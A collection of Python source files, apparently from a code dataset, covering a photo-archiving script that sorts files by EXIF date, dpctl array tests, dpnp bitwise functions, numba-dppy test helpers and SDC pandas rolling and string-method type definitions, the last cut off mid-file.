from src.printer import Printer
from src.logger import Logger
printer = Printer()
logger = Logger()
ignored_files = (
".DS_Store",
"Thumbs.db",
"ZbThumbnail.info",
)
class Phockup():
def __init__(self, input, output, **args):
input = os.path.expanduser(input)
output = os.path.expanduser(output)
if input.endswith(os.path.sep):
input = input[:-1]
if output.endswith(os.path.sep):
output = output[:-1]
self.input = input
self.output = output
self.dir_format = args.get('dir_format', os.path.sep.join(['%Y', '%m', '%d']))
self.move = args.get('move', False)
self.link = args.get('link', False)
self.original_filenames = args.get('original_filenames', False)
self.date_regex = args.get('date_regex', None)
self.timestamp = args.get('timestamp', False)
self.output_log = args.get('output_log', False)
self.path_root = args.get('path_root', '')
self.date_field = args.get('date_field', False)
self.dry_run = args.get('dry_run', False)
self.check_directories()
self.walk_directory()
if self.output_log:
log_name = os.path.split(self.input)[1] + '.pickle'
printer.line(f'Saving log to {log_name}')
logger.save_to_disk(os.path.join(self.output, log_name))
def check_directories(self):
"""
Check if input and output directories exist.
If input does not exists it exits the process
If output does not exists it tries to create it or exit with error
"""
if not os.path.isdir(self.input) or not os.path.exists(self.input):
printer.error('Input directory "%s" does not exist or cannot be accessed' % self.input)
return
if not os.path.exists(self.output):
printer.line('Output directory "%s" does not exist, creating now' % self.output)
try:
if not self.dry_run:
os.makedirs(self.output)
except Exception:
printer.error('Cannot create output directory. No write access!')
def walk_directory(self):
"""
Walk input directory recursively and call process_file for each file except the ignored ones
"""
for root, _, files in os.walk(self.input):
files.sort()
for filename in files:
if filename in ignored_files:
checksum = self.checksum(os.path.join(root, filename))
logger.add_entry(checksum, os.path.join(root, filename), '', Logger.ACTION_IGNORE)
continue
file = os.path.join(root, filename)
self.process_file(file)
def checksum(self, file):
"""
Calculate checksum for a file.
Used to match if duplicated file name is actually a duplicated file
"""
block_size = 65536
sha256 = hashlib.sha256()
with open(file, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def is_image_or_video(self, mimetype):
"""
Use mimetype to determine if the file is an image or video
"""
pattern = re.compile('^(image/.+|video/.+|application/vnd.adobe.photoshop)$')
if pattern.match(mimetype):
return True
return False
def get_output_dir(self, date, file):
"""
Generate output directory path based on the extracted date and formatted using dir_format
If date is missing from the exifdata the file is going to "unknown" directory
unless user included a regex from filename or uses timestamp
"""
toplevel = 'archive'
if date and not date['guessing']:
try:
path = [self.output, toplevel, date['date'].date().strftime(self.dir_format)]
except:
# keep relative path (from src root dir) , .e.g.
# root_dir/rel/path/bla.pdf ==> dst_dir/unknown/rel/path/bla.pdf
repl = self.path_root if self.path_root else self.input
if not repl.endswith(os.path.sep):
repl = repl + os.path.sep
rel_path_from_root = os.path.dirname(os.path.abspath(file)).replace(repl, '')
path = [self.output, 'unknown', rel_path_from_root]
else:
# keep relative path (from src root dir) , .e.g.
# root_dir/rel/path/bla.pdf ==> dst_dir/unknown/rel/path/bla.pdf
repl = self.path_root if self.path_root else self.input
if not repl.endswith(os.path.sep):
repl = repl + os.path.sep
rel_path_from_root = os.path.dirname(os.path.abspath(file)).replace(repl, '')
path = [self.output, 'unknown', rel_path_from_root]
fullpath = os.path.sep.join(path)
if not os.path.isdir(fullpath) and not self.dry_run:
os.makedirs(fullpath)
return fullpath
def get_file_name(self, file, date):
"""
Generate file name based on exif data unless it is missing or
original filenames are required. Then use original file name
"""
if self.original_filenames:
return os.path.basename(file)
try:
filename = [
'%04d' % date['date'].year,
'%02d' % date['date'].month,
'%02d' % date['date'].day,
'_',
'%02d' % date['date'].hour,
'%02d' % date['date'].minute,
'%02d' % date['date'].second,
]
if date['subseconds']:
filename.append(date['subseconds'])
return ''.join(filename) + os.path.splitext(file)[1]
except:
return os.path.basename(file)
def process_file(self, file):
"""
Process the file using the selected strategy
If file is .xmp skip it so process_xmp method can handle it
"""
if str.endswith(file, '.xmp'):
return None
printer.line(file, True)
output, target_file_name, target_file_path = self.get_file_name_and_path(file)
suffix = 1
target_file = target_file_path
if self.output_log:
checksum = self.checksum(file)
else:
checksum = ''
while True:
if os.path.isfile(target_file):
if not self.output_log:
checksum = self.checksum(file)
if checksum == self.checksum(target_file):
logger.add_entry(checksum, file, target_file, Logger.ACTION_SKIP)
printer.line(' => skipped, duplicated file %s' % target_file)
break
else:
if self.move and not self.dry_run:
try:
shutil.move(file, target_file)
logger.add_entry(checksum, file, target_file, Logger.ACTION_MOVE)
except FileNotFoundError:
printer.line(' => skipped, no such file or directory')
break
elif self.link and not self.dry_run:
os.link(file, target_file)
logger.add_entry(checksum, file, target_file, Logger.ACTION_LINK)
elif not self.dry_run:
try:
shutil.copy2(file, target_file)
logger.add_entry(checksum, file, target_file, Logger.ACTION_COPY)
except FileNotFoundError:
printer.line(' => skipped, no such file or directory')
break
printer.line(' => %s' % target_file)
self.process_xmp(file, target_file_name, suffix, output)
break
suffix += 1
target_split = os.path.splitext(target_file_path)
target_file = "%s-%d%s" % (target_split[0], suffix, target_split[1])
def get_file_name_and_path(self, file):
"""
Returns target file name and path
"""
exif_data = Exif(file).data()
if exif_data and 'MIMEType' in exif_data and self.is_image_or_video(exif_data['MIMEType']):
date = Date(file).from_exif(exif_data, self.timestamp, self.date_regex, self.date_field)
output = self.get_output_dir(date, file)
target_file_name = self.get_file_name(file, date).lower()
if not self.original_filenames:
target_file_name = target_file_name.lower()
target_file_path = os.path.sep.join([output, target_file_name])
else:
output = self.get_output_dir(False, file)
target_file_name = os.path.basename(file)
target_file_path = os.path.sep.join([output, target_file_name])
return output, target_file_name, target_file_path
def process_xmp(self, file, file_name, suffix, output):
"""
Process xmp files. These are meta data for RAW images
"""
xmp_original_with_ext = file + '.xmp'
xmp_original_without_ext = os.path.splitext(file)[0] + '.xmp'
suffix = '-%s' % suffix if suffix > 1 else ''
if os.path.isfile(xmp_original_with_ext):
xmp_original = xmp_original_with_ext
xmp_target = '%s%s.xmp' % (file_name, suffix)
elif os.path.isfile(xmp_original_without_ext):
xmp_original = xmp_original_without_ext
xmp_target = '%s%s.xmp' % (os.path.splitext(file_name)[0], suffix)
else:
xmp_original = None
xmp_target = None
if xmp_original:
xmp_path = os.path.sep.join([output, xmp_target])
printer.line('%s => %s' % (xmp_original, xmp_path))
if not self.dry_run:
if self.move:
shutil.move(xmp_original, xmp_path)
elif self.link:
os.link(xmp_original, xmp_path)
else:
shutil.copy2(xmp_original, xmp_path)
``` |
{
"source": "1e-to/dpctl",
"score": 2
} |
#### File: dpctl/tests/test_tensor_asarray.py
```python
import numpy as np
import pytest
import dpctl
import dpctl.tensor as dpt
@pytest.mark.parametrize(
"src_usm_type, dst_usm_type",
[
("device", "shared"),
("device", "host"),
("shared", "device"),
("shared", "host"),
("host", "device"),
("host", "shared"),
],
)
def test_asarray_change_usm_type(src_usm_type, dst_usm_type):
d = dpctl.SyclDevice()
if d.is_host:
pytest.skip(
"Skip test of host device, which only "
"supports host USM allocations"
)
X = dpt.empty(10, dtype="u1", usm_type=src_usm_type)
Y = dpt.asarray(X, usm_type=dst_usm_type)
assert X.shape == Y.shape
assert X.usm_type == src_usm_type
assert Y.usm_type == dst_usm_type
with pytest.raises(ValueError):
# zero copy is not possible
dpt.asarray(X, usm_type=dst_usm_type, copy=False)
Y = dpt.asarray(X, usm_type=dst_usm_type, sycl_queue=X.sycl_queue)
assert X.shape == Y.shape
assert Y.usm_type == dst_usm_type
Y = dpt.asarray(
X,
usm_type=dst_usm_type,
sycl_queue=X.sycl_queue,
device=d.get_filter_string(),
)
assert X.shape == Y.shape
assert Y.usm_type == dst_usm_type
def test_asarray_from_numpy():
Xnp = np.arange(10)
Y = dpt.asarray(Xnp, usm_type="device")
assert type(Y) is dpt.usm_ndarray
assert Y.shape == (10,)
assert Y.dtype == Xnp.dtype
def test_asarray_from_sequence():
X = [1, 2, 3]
Y = dpt.asarray(X, usm_type="device")
assert type(Y) is dpt.usm_ndarray
X = [(1, 1), (2.0, 2.0 + 1.0j), range(4, 6), np.array([3, 4], dtype="c16")]
Y = dpt.asarray(X, usm_type="device")
assert type(Y) is dpt.usm_ndarray
assert Y.ndim == 2
def test_asarray_from_object_with_suai():
"""Test that asarray can deal with opaque objects implementing SUAI"""
class Dummy:
def __init__(self, obj, iface):
self.obj = obj
self.__sycl_usm_array_interface__ = iface
X = dpt.empty((2, 3, 4), dtype="f4")
Y = dpt.asarray(Dummy(X, X.__sycl_usm_array_interface__))
assert Y.shape == X.shape
assert X.usm_type == Y.usm_type
assert X.dtype == Y.dtype
assert X.sycl_device == Y.sycl_device
def test_asarray_input_validation():
with pytest.raises(TypeError):
# copy keyword is not of right type
dpt.asarray([1], copy="invalid")
with pytest.raises(TypeError):
# order keyword is not valid
dpt.asarray([1], order=1)
with pytest.raises(TypeError):
# dtype is not valid
dpt.asarray([1], dtype="invalid")
with pytest.raises(ValueError):
# unexpected value of order
dpt.asarray([1], order="Z")
with pytest.raises(TypeError):
# usm_type is of wrong type
dpt.asarray([1], usm_type=dict())
with pytest.raises(ValueError):
# usm_type has wrong value
dpt.asarray([1], usm_type="mistake")
with pytest.raises(TypeError):
# sycl_queue type is not right
dpt.asarray([1], sycl_queue=dpctl.SyclContext())
with pytest.raises(ValueError):
# sequence is not rectangular
dpt.asarray([[1], 2])
def test_asarray_input_validation2():
d = dpctl.get_devices()
if len(d) < 2:
pytest.skip("Not enough SYCL devices available")
d0, d1 = d[:2]
try:
q0 = dpctl.SyclQueue(d0)
except dpctl.SyclQueueCreationError:
pytest.skip(f"SyclQueue could not be created for {d0}")
try:
q1 = dpctl.SyclQueue(d1)
except dpctl.SyclQueueCreationError:
pytest.skip(f"SyclQueue could not be created for {d1}")
with pytest.raises(TypeError):
dpt.asarray([1, 2], sycl_queue=q0, device=q1)
def test_asarray_scalars():
import ctypes
Y = dpt.asarray(5)
assert Y.dtype == np.dtype(int)
Y = dpt.asarray(5.2)
assert Y.dtype == np.dtype(float)
Y = dpt.asarray(np.float32(2.3))
assert Y.dtype == np.dtype(np.float32)
Y = dpt.asarray(1.0j)
assert Y.dtype == np.dtype(complex)
Y = dpt.asarray(ctypes.c_int(8))
assert Y.dtype == np.dtype(ctypes.c_int)
def test_asarray_copy_false():
try:
q = dpctl.SyclQueue()
except dpctl.SyclQueueCreationError:
pytest.skip("Could not create a queue")
X = dpt.from_numpy(np.random.randn(10, 4), usm_type="device", sycl_queue=q)
Y1 = dpt.asarray(X, copy=False, order="K")
assert Y1 is X
Y1c = dpt.asarray(X, copy=True, order="K")
assert not (Y1c is X)
Y2 = dpt.asarray(X, copy=False, order="C")
assert Y2 is X
Y3 = dpt.asarray(X, copy=False, order="A")
assert Y3 is X
with pytest.raises(ValueError):
Y1 = dpt.asarray(X, copy=False, order="F")
Xf = dpt.empty(
X.shape,
dtype=X.dtype,
usm_type="device",
sycl_queue=X.sycl_queue,
order="F",
)
Xf[:] = X
Y4 = dpt.asarray(Xf, copy=False, order="K")
assert Y4 is Xf
Y5 = dpt.asarray(Xf, copy=False, order="F")
assert Y5 is Xf
Y6 = dpt.asarray(Xf, copy=False, order="A")
assert Y6 is Xf
with pytest.raises(ValueError):
dpt.asarray(Xf, copy=False, order="C")
``` |
{
"source": "1e-to/dpnp",
"score": 2
} |
#### File: dpnp/dpnp/dpnp_iface_bitwise.py
```python
import numpy
from dpnp.dpnp_algo import *
from dpnp.dparray import dparray
from dpnp.dpnp_utils import *
import dpnp
__all__ = [
'bitwise_and',
'bitwise_or',
'bitwise_xor',
'invert',
'bitwise_not',
'left_shift',
'right_shift',
]
def _check_nd_call(origin_func, dpnp_func, *input_arrays,
check_sizes=False, check_shapes=False, check_dtypes=False, **kwargs):
"""
Choose function to call based on required input arrays types, data types and shapes
and call chosen fucntion.
Parameters
----------
origin_func : function
original function to call if at least one input array didn't meet the requirements
dpnp_func : function
dpnp function to call if all the input arrays met the requirements
input_arrays : tuple(arrays)
input arrays
check_sizes : bool
to check all input arrays sizes are equal
check_shapes : bool
to check all input arrays shapes are equal
check_dtypes : bool
to check all input arrays data types are equal
kwargs : dict
remaining input parameters of the function
Returns
-------
result of the function call
"""
x1, *_ = input_arrays
if not use_origin_backend(x1) and not kwargs:
for x in input_arrays:
if not isinstance(x, dparray):
break
else:
if check_sizes and len(set(x.size for x in input_arrays)) > 1:
pass # fallback to numpy in case of different sizes of input arrays
elif check_shapes and len(set(x.shape for x in input_arrays)) > 1:
pass # fallback to numpy in case of different shapes of input arrays
elif check_dtypes and len(set(x.dtype for x in input_arrays)) > 1:
pass # fallback to numpy in case of different dtypes of input arrays
else:
return dpnp_func(*input_arrays)
return call_origin(origin_func, *input_arrays, **kwargs)
def bitwise_and(x1, x2, **kwargs):
"""
Compute the bit-wise AND of two arrays element-wise.
For full documentation refer to :obj:`numpy.bitwise_and`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.logical_and` : Compute the truth value of ``x1`` AND ``x2`` element-wise.
:obj:`dpnp.bitwise_or`: Compute the bit-wise OR of two arrays element-wise.
:obj:`dpnp.bitwise_xor` : Compute the bit-wise XOR of two arrays element-wise.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([2, 5, 255])
>>> x2 = np.array([3,14,16])
>>> out = np.bitwise_and(x1, x2)
>>> [i for i in out]
[2, 4, 16]
"""
return _check_nd_call(numpy.bitwise_and, dpnp_bitwise_and, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def bitwise_or(x1, x2, **kwargs):
"""
Compute the bit-wise OR of two arrays element-wise.
For full documentation refer to :obj:`numpy.bitwise_or`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.logical_or` : Compute the truth value of ``x1`` OR ``x2`` element-wise.
:obj:`dpnp.bitwise_and`: Compute the bit-wise AND of two arrays element-wise.
:obj:`dpnp.bitwise_xor` : Compute the bit-wise XOR of two arrays element-wise.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([2, 5, 255])
>>> x2 = np.array([4, 4, 4])
>>> out = np.bitwise_or(x1, x2)
>>> [i for i in out]
[6, 5, 255]
"""
return _check_nd_call(numpy.bitwise_or, dpnp_bitwise_or, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def bitwise_xor(x1, x2, **kwargs):
"""
Compute the bit-wise XOR of two arrays element-wise.
For full documentation refer to :obj:`numpy.bitwise_xor`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.logical_xor` : Compute the truth value of ``x1`` XOR `x2`, element-wise.
:obj:`dpnp.bitwise_and`: Compute the bit-wise AND of two arrays element-wise.
:obj:`dpnp.bitwise_or` : Compute the bit-wise OR of two arrays element-wise.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([31, 3])
>>> x2 = np.array([5, 6])
>>> out = np.bitwise_xor(x1, x2)
>>> [i for i in out]
[26, 5]
"""
return _check_nd_call(numpy.bitwise_xor, dpnp_bitwise_xor, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def invert(x, **kwargs):
"""
Compute bit-wise inversion, or bit-wise NOT, element-wise.
For full documentation refer to :obj:`numpy.invert`.
Limitations
-----------
Parameters ``x`` is supported as :obj:`dpnp.ndarray`.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input array ``x`` is supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.bitwise_and`: Compute the bit-wise AND of two arrays element-wise.
:obj:`dpnp.bitwise_or` : Compute the bit-wise OR of two arrays element-wise.
:obj:`dpnp.bitwise_xor` : Compute the bit-wise XOR of two arrays element-wise.
:obj:`dpnp.logical_not` : Compute the truth value of NOT x element-wise.
Examples
--------
>>> import dpnp as np
>>> x = np.array([13])
>>> out = np.invert(x)
>>> out[0]
-14
"""
return _check_nd_call(numpy.invert, dpnp_invert, x, **kwargs)
bitwise_not = invert # bitwise_not is an alias for invert
def left_shift(x1, x2, **kwargs):
"""
Shift the bits of an integer to the left.
For full documentation refer to :obj:`numpy.left_shift`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.right_shift` : Shift the bits of an integer to the right.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([5, 5, 5])
>>> x2 = np.array([1, 2, 3])
>>> out = np.left_shift(x1, x2)
>>> [i for i in out]
[10, 20, 40]
"""
return _check_nd_call(numpy.left_shift, dpnp_left_shift, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def right_shift(x1, x2, **kwargs):
"""
Shift the bits of an integer to the right.
For full documentation refer to :obj:`numpy.right_shift`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.left_shift` : Shift the bits of an integer to the left.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([10, 10, 10])
>>> x2 = np.array([1, 2, 3])
>>> out = np.right_shift(x1, x2)
>>> [i for i in out]
[5, 2, 1]
"""
return _check_nd_call(numpy.right_shift, dpnp_right_shift, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
``` |
{
"source": "1e-to/numba-dppy",
"score": 2
} |
#### File: numba_dppy/tests/_helper.py
```python
import contextlib
import dpctl
import pytest
from numba.tests.support import captured_stdout
from numba_dppy import config
def has_opencl_gpu():
"""
Checks if dpctl is able to select an OpenCL GPU device.
"""
return bool(dpctl.get_num_devices(backend="opencl", device_type="gpu"))
def has_opencl_cpu():
"""
Checks if dpctl is able to select an OpenCL CPU device.
"""
return bool(dpctl.get_num_devices(backend="opencl", device_type="cpu"))
def has_level_zero():
"""
Checks if dpctl is able to select a Level Zero GPU device.
"""
return bool(dpctl.get_num_devices(backend="level_zero", device_type="gpu"))
def has_sycl_platforms():
"""
Checks if dpctl is able to identify a non-host SYCL platform.
"""
platforms = dpctl.get_platforms()
for p in platforms:
if p.backend is not dpctl.backend_type.host:
return True
return False
def is_gen12(device_type):
with dpctl.device_context(device_type):
q = dpctl.get_current_queue()
device = q.get_sycl_device()
name = device.name
if "Gen12" in name:
return True
return False
def platform_not_supported(device_type):
import platform
platform = platform.system()
device = device_type.split(":")[0]
if device == "level_zero" and platform == "Windows":
return True
return False
def skip_test(device_type):
skip = False
try:
with dpctl.device_context(device_type):
pass
except Exception:
skip = True
if not skip:
if platform_not_supported(device_type):
skip = True
return skip
skip_no_opencl_gpu = pytest.mark.skipif(
not has_opencl_gpu(),
reason="No opencl GPU platforms available",
)
skip_no_opencl_cpu = pytest.mark.skipif(
not has_opencl_cpu(),
reason="No opencl CPU platforms available",
)
skip_no_level_zero_gpu = pytest.mark.skipif(
not has_level_zero(),
reason="No level-zero GPU platforms available",
)
filter_strings = [
pytest.param("level_zero:gpu:0", marks=skip_no_level_zero_gpu),
pytest.param("opencl:gpu:0", marks=skip_no_opencl_gpu),
pytest.param("opencl:cpu:0", marks=skip_no_opencl_cpu),
]
@contextlib.contextmanager
def override_config(name, value, config=config):
"""
Extends `numba/tests/support.py:override_config()` with argument `config`
which is `numba_dppy.config` by default.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
def _id(obj):
return obj
def ensure_dpnp():
try:
from numba_dppy.dpnp_iface import dpnp_fptr_interface as dpnp_iface
return True
except:
return False
@contextlib.contextmanager
def dpnp_debug():
import numba_dppy.dpnp_iface as dpnp_lowering
old, dpnp_lowering.DEBUG = dpnp_lowering.DEBUG, 1
yield
dpnp_lowering.DEBUG = old
@contextlib.contextmanager
def assert_dpnp_implementaion():
from numba.tests.support import captured_stdout
with captured_stdout() as stdout, dpnp_debug():
yield
assert (
"dpnp implementation" in stdout.getvalue()
), "dpnp implementation is not used"
@contextlib.contextmanager
def assert_auto_offloading(parfor_offloaded=1, parfor_offloaded_failure=0):
"""
If ``parfor_offloaded`` is not provided this context_manager
will check for 1 occurrance of success message. Developers
can always specify how many parfor offload success message
is expected.
If ``parfor_offloaded_failure`` is not provided the default
behavior is to expect 0 failure message, in other words, we
expect all parfors present in the code to be successfully
offloaded to GPU.
"""
old_debug = config.DEBUG
config.DEBUG = 1
with captured_stdout() as stdout:
yield
config.DEBUG = old_debug
got_parfor_offloaded = stdout.getvalue().count("Parfor offloaded to")
assert parfor_offloaded == got_parfor_offloaded, (
"Expected %d parfor(s) to be auto offloaded, instead got %d parfor(s) auto offloaded"
% (parfor_offloaded, got_parfor_offloaded)
)
got_parfor_offloaded_failure = stdout.getvalue().count(
"Failed to offload parfor to"
)
assert parfor_offloaded_failure == got_parfor_offloaded_failure, (
"Expected %d parfor(s) to be not auto offloaded, instead got %d parfor(s) not auto offloaded"
% (parfor_offloaded_failure, got_parfor_offloaded_failure)
)
``` |
{
"source": "1e-to/sdc",
"score": 2
} |
#### File: sdc/datatypes/hpat_pandas_rolling_types.py
```python
from numba import cgutils, types
from numba.datamodel import StructModel
from numba.extending import make_attribute_wrapper, models
from numba.typing.templates import signature
from sdc.utilities.sdc_typing_utils import TypeChecker
class RollingType(types.Type):
"""Type definition for pandas.rolling functions handling."""
def __init__(self, ty, data, win_type=None, on=None, closed=None):
self.data = data
self.win_type = win_type or types.none
self.on = on or types.none
self.closed = closed or types.none
name_tmpl = '{}({}, win_type={}, on={}, closed={})'
name = name_tmpl.format(ty, data, self.win_type, self.on, self.closed)
super(RollingType, self).__init__(name)
class RollingTypeModel(StructModel):
"""Model for RollingType type."""
def __init__(self, dmm, fe_type):
members = [
('data', fe_type.data),
# window is able to be offset
('window', types.intp),
('min_periods', types.intp),
('center', types.boolean),
('win_type', fe_type.win_type),
('on', fe_type.on),
# axis is able to be unicode type
('axis', types.intp),
('closed', fe_type.closed),
]
models.StructModel.__init__(self, dmm, fe_type, members)
make_attribute_wrapper(RollingType, 'data', '_data')
make_attribute_wrapper(RollingType, 'window', '_window')
make_attribute_wrapper(RollingType, 'min_periods', '_min_periods')
make_attribute_wrapper(RollingType, 'center', '_center')
make_attribute_wrapper(RollingType, 'win_type', '_win_type')
make_attribute_wrapper(RollingType, 'on', '_on')
make_attribute_wrapper(RollingType, 'axis', '_axis')
make_attribute_wrapper(RollingType, 'closed', '_closed')
def gen_hpat_pandas_rolling_init(ty):
"""Generate rolling initializer based on data type"""
def _hpat_pandas_rolling_init(typingctx, self, window, min_periods=None,
center=False, win_type=None,
on=None, axis=0, closed=None):
"""Internal Numba required function to register RollingType."""
ret_typ = ty(self, win_type, on, closed)
sig = signature(ret_typ, self, window, min_periods,
center, win_type, on, axis, closed)
def _codegen(context, builder, sig, args):
"""Create DataFrameRollingTypeModel structure."""
data, window, min_periods, center, win_type, on, axis, closed = args
rolling = cgutils.create_struct_proxy(sig.return_type)(context, builder)
rolling.data = data
rolling.window = window
rolling.min_periods = min_periods
rolling.center = center
rolling.win_type = win_type
rolling.on = on
rolling.axis = axis
rolling.closed = closed
if context.enable_nrt:
context.nrt.incref(builder, self, rolling.data)
return rolling._getvalue()
return sig, _codegen
return _hpat_pandas_rolling_init
def gen_sdc_pandas_rolling_overload_body(initializer, ty):
"""Generate code of the overloaded method using associated DataType and constructor."""
def sdc_pandas_rolling(self, window, min_periods=None, center=False,
win_type=None, on=None, axis=0, closed=None):
ty_checker = TypeChecker('Method rolling().')
ty_checker.check(self, ty)
if not isinstance(window, types.Integer):
ty_checker.raise_exc(window, 'int', 'window')
minp_accepted = (types.Omitted, types.NoneType, types.Integer)
if not isinstance(min_periods, minp_accepted) and min_periods is not None:
ty_checker.raise_exc(min_periods, 'None, int', 'min_periods')
center_accepted = (types.Omitted, types.Boolean)
if not isinstance(center, center_accepted) and center is not False:
ty_checker.raise_exc(center, 'bool', 'center')
str_types = (types.Omitted, types.NoneType, types.StringLiteral, types.UnicodeType)
if not isinstance(win_type, str_types) and win_type is not None:
ty_checker.raise_exc(win_type, 'str', 'win_type')
if not isinstance(on, str_types) and on is not None:
ty_checker.raise_exc(on, 'str', 'on')
axis_accepted = (types.Omitted, types.Integer, types.StringLiteral, types.UnicodeType)
if not isinstance(axis, axis_accepted) and axis != 0:
ty_checker.raise_exc(axis, 'int, str', 'axis')
if not isinstance(closed, str_types) and closed is not None:
ty_checker.raise_exc(closed, 'str', 'closed')
nan_minp = isinstance(min_periods, (types.Omitted, types.NoneType)) or min_periods is None
def sdc_pandas_rolling_impl(self, window, min_periods=None, center=False,
win_type=None, on=None, axis=0, closed=None):
if window < 0:
raise ValueError('window must be non-negative')
if nan_minp == True: # noqa
minp = window
else:
minp = min_periods
if minp < 0:
raise ValueError('min_periods must be >= 0')
if minp > window:
raise ValueError('min_periods must be <= window')
if center != False: # noqa
raise ValueError('Method rolling(). The object center\n expected: False')
if win_type is not None:
raise ValueError('Method rolling(). The object win_type\n expected: None')
if on is not None:
raise ValueError('Method rolling(). The object on\n expected: None')
if axis != 0:
raise ValueError('Method rolling(). The object axis\n expected: 0')
if closed is not None:
raise ValueError('Method rolling(). The object closed\n expected: None')
return initializer(self, window, minp, center, win_type, on, axis, closed)
return sdc_pandas_rolling_impl
return sdc_pandas_rolling
sdc_pandas_rolling_docstring_tmpl = """
Intel Scalable Dataframe Compiler User Guide
********************************************
Pandas API: pandas.{ty}.rolling
Limitations
-----------
Parameters ``center``, ``win_type``, ``on``, ``axis`` and ``closed`` are supported only with default values.
Examples
--------
.. literalinclude:: ../../../examples/{ty_lower}/rolling/{ty_lower}_rolling_min.py
:language: python
:lines: 27-
:caption: Calculate the rolling minimum.
:name: ex_{ty_lower}_rolling
.. command-output:: python ./{ty_lower}/rolling/{ty_lower}_rolling_min.py
:cwd: ../../../examples
.. todo:: Add support of parameters ``center``, ``win_type``, ``on``, ``axis`` and ``closed``
.. seealso::
:ref:`expanding <pandas.{ty}.expanding>`
Provides expanding transformations.
:ref:`ewm <pandas.{ty}.ewm>`
Provides exponential weighted functions.
Intel Scalable Dataframe Compiler Developer Guide
*************************************************
Pandas {ty} attribute :attr:`pandas.{ty}.rolling` implementation
.. only:: developer
Test: python -m sdc.runtests -k sdc.tests.test_rolling.TestRolling.test_{ty_lower}_rolling
Parameters
----------
self: :obj:`pandas.{ty}`
Input {ty}.
window: :obj:`int` or :obj:`offset`
Size of the moving window.
min_periods: :obj:`int`
Minimum number of observations in window required to have a value.
center: :obj:`bool`
Set the labels at the center of the window.
*unsupported*
win_type: :obj:`str`
Provide a window type.
*unsupported*
on: :obj:`str`
Column on which to calculate the rolling window.
*unsupported*
axis: :obj:`int`, :obj:`str`
Axis along which the operation acts
0/None/'index' - row-wise operation
1/'columns' - column-wise operation
*unsupported*
closed: :obj:`str`
Make the interval closed on the ‘right’, ‘left’, ‘both’ or ‘neither’ endpoints.
*unsupported*
Returns
-------
:class:`pandas.{ty}.rolling`
Output class to manipulate with input data.
"""
```
#### File: sdc/datatypes/hpat_pandas_stringmethods_types.py
```python
import pandas
from numba import types, cgutils
from numba.extending import (models, overload, register_model, make_attribute_wrapper, intrinsic)
from numba.datamodel import (register_default, StructModel)
from numba.typing.templates import signature
from sdc.hiframes.split_impl import SplitViewStringMethodsType, StringArraySplitViewType
from sdc.utilities.utils import sdc_overload
class StringMethodsType(types.IterableType):
"""
Type definition for pandas.core.strings.StringMethods functions handling.
Members
----------
_data: :class:`SeriesType`
input arg
"""
def __init__(self, data):
self.data = data
name = 'StringMethodsType({})'.format(self.data)
super(StringMethodsType, self).__init__(name)
@property
def iterator_type(self):
return None
@register_model(StringMethodsType)
class StringMethodsTypeModel(StructModel):
"""
Model for StringMethodsType type
All members must be the same as main type for this model
"""
def __init__(self, dmm, fe_type):
members = [
('data', fe_type.data)
]
models.StructModel.__init__(self, dmm, fe_type, members)
make_attribute_wrapper(StringMethodsType, 'data', '_data')
def _gen_hpat_pandas_stringmethods_init(string_methods_type=None):
string_methods_type = string_methods_type or StringMethodsType
def _hpat_pandas_stringmethods_init(typingctx, data):
"""
Internal Numba required function to register StringMethodsType and
connect it with corresponding Python type mentioned in @overload(pandas.core.strings.StringMethods)
"""
def _hpat_pandas_stringmethods_init_codegen(context, builder, signature, args):
"""
It is looks like it creates StringMethodsModel structure
- Fixed number of parameters. Must be 4
- increase reference count for the data
"""
[data_val] = args
stringmethod = cgutils.create_struct_proxy(signature.return_type)(context, builder)
stringmethod.data = data_val
if context.enable_nrt:
context.nrt.incref(builder, data, stringmethod.data)
return stringmethod._getvalue()
